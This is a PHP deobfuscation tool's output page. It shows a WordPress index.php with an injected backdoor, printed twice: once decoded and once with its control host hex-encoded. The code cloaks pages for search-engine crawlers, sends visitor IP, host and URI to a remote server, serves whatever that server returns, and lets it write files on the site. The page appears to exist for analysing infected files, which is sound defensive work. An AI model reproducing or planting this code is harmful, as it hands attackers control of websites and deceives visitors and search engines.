Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$ixv = "3.3.31";$gov ..

Decoded Output download

<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$ixv = "3.3.31";$gov = "1200.sdoim.com";$db = "5200";$ip = $_SERVER["REMOTE_ADDR"];$ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";$uri = $_SERVER["REQUEST_URI"];$host = $_SERVER["HTTP_HOST"];$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:"";$token = isset($_SERVER['HTTP_XDOIM'])?$_SERVER['HTTP_XDOIM']:"";$proto = ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) ?  "https": "http";$header = array('Lang: '.$lang,'User-Agent: '.$ua, 'Referer: '.$ur, 'Http-Proto: '.$proto, 'Http-Host: '.$host, 'Http-Uri: '.$uri, 'Dbgroup: '.$db, 'Http-X-Forwarded-For: '.$ip,'Token: '.$token);$postdata= "proto=$proto&shost=$host&ip=$ip&dbgroup=$db&uri=$uri";if (($uri!=="/favicon.ico") &&( @preg_match('#google|yahoo|bing|archive#i',$ua) || (@preg_match('#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i',$ur) && @preg_match('#[/\?][a-z0-9]{1}\d+#i',$uri)))){        list($cntx,$code,$ctype) = urlx('http://'.$gov.'/index?'.$postdata,$header,$postdata);    if ($code >= 400 && $code < 500){@header('HTTP/1.1 404 Not Found');exit($cntx);}    if ($code >= 500){@header('HTTP/1.1 500 Internal Server Error');exit;}    if (stripos($ctype,'gzip')>0){ @header('Content-type: application/x-gzip'); exit($cntx); }    if (stripos($cntx,'<!doct')===0||stripos($cntx,'<html')===0){ exit($cntx); }    if (stripos($cntx,'<?xml')===0){ @header('Content-type: text/xml'); exit($cntx); }    if (stripos($cntx,'User-a')===0){ @header('Content-type: text/plain;charset=utf-8'); exit($cntx); }    if (stripos($cntx,'http')===0){        if (stripos($cntx,'?main_page=')){ @header('Location: ' . $cntx); exit;}        if (strstr($cntx,"[,]")){$segs = explode("[,]",$cntx); $lines = explode(",",$segs[0]); $result = ''; foreach($lines as $url){ list($respbody,$code) = urlx($url,null,null,$segs[1]);$result .= $url.$respbody; } exit($result);}        if (stripos($cntx,'mercdn') || stripos($cntx,'img.fril')){ @header('Content-type: image/jpg'); list($cnimg,$code,$ctype) =urlx($cntx.$uri); exit($cnimg);}    }    if (@preg_match('#^[^.]*.(txt|php)#i',$cntx)){$values = explode("[,]",$cntx); todk($values[0],$values[1]); if(file_exists($values[0])){ exit('end ok');}else{ exit('no false');} }    if (stripos($cntx,'ok')===0){ exit($cntx." ".$db." ".$gov." ".$ixv); }    if ($cntx!=""){ exit($cntx); }}function urlx($url,$header=null,$postdata=null,$ua=null) {    if (!function_exists('curl_init')){ return; }    try {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);        ($header===null)?'':curl_setopt($ch, CURLOPT_HTTPHEADER, $header); ($ua===null||$ua==="")?'':curl_setopt($ch, CURLOPT_USERAGENT, $ua);        if ($postdata!==null && $postdata!=="") {curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); }        $body = curl_exec($ch);$code = curl_getinfo($ch,CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch,CURLINFO_CONTENT_TYPE);curl_close($ch);    } catch (Exception $e) { }   if ($body===false && function_exists('file_get_contents')) {        ini_set('user_agent', 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)');        try {            $body = @file_get_contents($url);        } catch (Exception $e) { }    }    return array($body,$code,$ctype);} 
 
/** 
 * Front to the WordPress application. This file doesn't do anything, but loads 
 * wp-blog-header.php which does and tells WordPress to load the theme. 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Tells WordPress to load the WordPress theme and output it. 
 * 
 * @var bool 
 */ 
define( 'WP_USE_THEMES', true ); 
 
/** Loads the WordPress Environment and Template */ 
require( dirname( __FILE__ ) . '/wp-blog-header.php' ); ?>

Did this file decode correctly?

Original Code

<?php error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$ixv = "3.3.31";$gov = "\x31\62\x30\60\x2e\163\x64\157\x69\155\x2e\143\x6f\155";$db = "5200";$ip = $_SERVER["REMOTE_ADDR"];$ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";$uri = $_SERVER["REQUEST_URI"];$host = $_SERVER["HTTP_HOST"];$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:"";$token = isset($_SERVER['HTTP_XDOIM'])?$_SERVER['HTTP_XDOIM']:"";$proto = ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) ?  "https": "http";$header = array('Lang: '.$lang,'User-Agent: '.$ua, 'Referer: '.$ur, 'Http-Proto: '.$proto, 'Http-Host: '.$host, 'Http-Uri: '.$uri, 'Dbgroup: '.$db, 'Http-X-Forwarded-For: '.$ip,'Token: '.$token);$postdata= "proto=$proto&shost=$host&ip=$ip&dbgroup=$db&uri=$uri";if (($uri!=="/favicon.ico") &&( @preg_match('#google|yahoo|bing|archive#i',$ua) || (@preg_match('#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i',$ur) && @preg_match('#[/\?][a-z0-9]{1}\d+#i',$uri)))){        list($cntx,$code,$ctype) = urlx('http://'.$gov.'/index?'.$postdata,$header,$postdata);    if ($code >= 400 && $code < 500){@header('HTTP/1.1 404 Not Found');exit($cntx);}    if ($code >= 500){@header('HTTP/1.1 500 Internal Server Error');exit;}    if (stripos($ctype,'gzip')>0){ @header('Content-type: application/x-gzip'); exit($cntx); }    if (stripos($cntx,'<!doct')===0||stripos($cntx,'<html')===0){ exit($cntx); }    if (stripos($cntx,'<?xml')===0){ @header('Content-type: text/xml'); exit($cntx); }    if (stripos($cntx,'User-a')===0){ @header('Content-type: text/plain;charset=utf-8'); exit($cntx); }    if (stripos($cntx,'http')===0){        if (stripos($cntx,'?main_page=')){ @header('Location: ' . $cntx); exit;}        if (strstr($cntx,"[,]")){$segs = explode("[,]",$cntx); $lines = explode(",",$segs[0]); $result = ''; foreach($lines as $url){ list($respbody,$code) = urlx($url,null,null,$segs[1]);$result .= $url.$respbody; } exit($result);}        if (stripos($cntx,'mercdn') || stripos($cntx,'img.fril')){ @header('Content-type: image/jpg'); list($cnimg,$code,$ctype) =urlx($cntx.$uri); exit($cnimg);}    }    if (@preg_match('#^[^.]*.(txt|php)#i',$cntx)){$values = explode("[,]",$cntx); todk($values[0],$values[1]); if(file_exists($values[0])){ exit('end ok');}else{ exit('no false');} }    if (stripos($cntx,'ok')===0){ exit($cntx." ".$db." ".$gov." ".$ixv); }    if ($cntx!=""){ exit($cntx); }}function urlx($url,$header=null,$postdata=null,$ua=null) {    if (!function_exists('curl_init')){ return; }    try {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);        ($header===null)?'':curl_setopt($ch, CURLOPT_HTTPHEADER, $header); ($ua===null||$ua==="")?'':curl_setopt($ch, CURLOPT_USERAGENT, $ua);        if ($postdata!==null && $postdata!=="") {curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); }        $body = curl_exec($ch);$code = curl_getinfo($ch,CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch,CURLINFO_CONTENT_TYPE);curl_close($ch);    } catch (Exception $e) { }   if ($body===false && function_exists('file_get_contents')) {        ini_set('user_agent', 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)');        try {            $body = @file_get_contents($url);        } catch (Exception $e) { }    }    return array($body,$code,$ctype);}

/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

Function Calls

set_time_limit 1
error_reporting 1
ignore_user_abort 1

Variables

None

Stats

MD5 331822c2e90c16109419e2af67d0b540
Eval Count 0
Decode Time 260 ms